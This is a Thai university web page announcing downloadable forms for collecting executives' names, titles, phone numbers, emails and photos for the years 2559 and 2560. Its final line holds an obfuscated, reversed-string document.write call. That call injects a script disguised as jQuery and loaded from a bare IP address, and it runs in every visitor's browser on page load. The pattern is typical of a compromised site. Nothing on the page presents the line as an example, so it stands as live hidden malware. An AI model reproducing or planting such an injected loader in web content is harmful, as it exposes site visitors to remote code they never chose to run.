ดาวน์โหลดเเบบฟอร์มการกรอกข้อมูล ชื่อ-เบอร์โทรศัพท์ผู้บริหาร ปี 60

ดาวน์โหลดเเบบฟอร์มการกรอกข้อมูล ชื่อ-เบอร์โทรศัพท์ผู้บริหาร ปี 60 รวบรวมข้อมูล ชื่อ ตำแหน่ง เบอร์โทรศัพท์ พ.ศ. 2560 ขอความร่วมมือทุกท่านสำรวจในส่วนงานของท่านและรวบรวมข้อมูล ชื่อ ตำแหน่งและเบอร์โทรศัพท์ที่อัพเดต จัดส่งข้อมูลชื่อ ฉายา นามสกุล ตำแหน่ง เบอร์โทรศัพท์ ภายใน เบอร์สำนักงาน เบอร์มือถือ และ E-mail ของผู้บริหารตั้งแต่ระดับรองอธิการบดี ผู้อำนวยการสำนัก ผู้อำนวยการกอง หรือเทียบเท่าหัวหน้าฝ่าย และรูปถ่ายผู้บริหาร (ระดับรองอธิการ รวมไปถึงผู้อำนวยการวิทยาลัยสงฆ์ด้วย) ภาพถ่ายอาคารสถานที่ในส่วนที่เป็นวิทยาเขต วิทยาลัยสงฆ์ ห้องเรียนหน่วยวิทยบริการ...

ดาวน์โหลดเเบบฟอร์มการกรอกข้อมูล ชื่อ-เบอร์โทรศัพท์ผู้บริหาร ปี 59ดาวน์โหลดเเบบฟอร์มการกรอกข้อมูล ชื่อ-เบอร์โทรศัพท์ผู้บริหาร ปี 59

แบบฟอร์มกรอกข้อมูลผู้บริหาร ปี2559รวบรวมข้อมูล ชื่อ ตำแหน่ง เบอร์โทรศัพท์ พ.ศ. 2559 ขอความร่วมมือทุกท่านสำรวจในส่วนงานของท่านและรวบรวมข้อมูล ชื่อ ตำแหน่งและเบอร์โทรศัพท์ที่อัพเดต จัดส่งข้อมูลชื่อ ฉายา นามสกุล ตำแหน่ง เบอร์โทรศัพท์ ภายใน เบอร์สำนักงาน เบอร์มือถือ และ E-mail ของผู้บริหารตั้งแต่ระดับรองอธิการบดี ผู้อำนวยการสำนัก ผู้อำนวยการกอง หรือเทียบเท่าหัวหน้าฝ่าย และรูปถ่ายผู้บริหาร (ระดับรองอธิการ) ภาพถ่ายอาคารสถานที่ในส่วนที่เป็นวิทยาเขต วิทยาลัยสงฆ์ ห้องเรียนหน่วยวิทยบริการ และที่ตั้งสถานที่ตั้งสำนักงาน  ดาวโหลดข้อมูลได้ที่ >>  คลิกเพื่อดาวน์โหลดแบบฟอร์มกรอกข้อมูลผู้บริหาร...

แบบฟอร์มขอรายชื่อผู้บริหาร

ดาวน์โหลดเอกสารเพิ่มเติม แบบฟอร์มขอรายชื่อผู้บริหาร document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))
X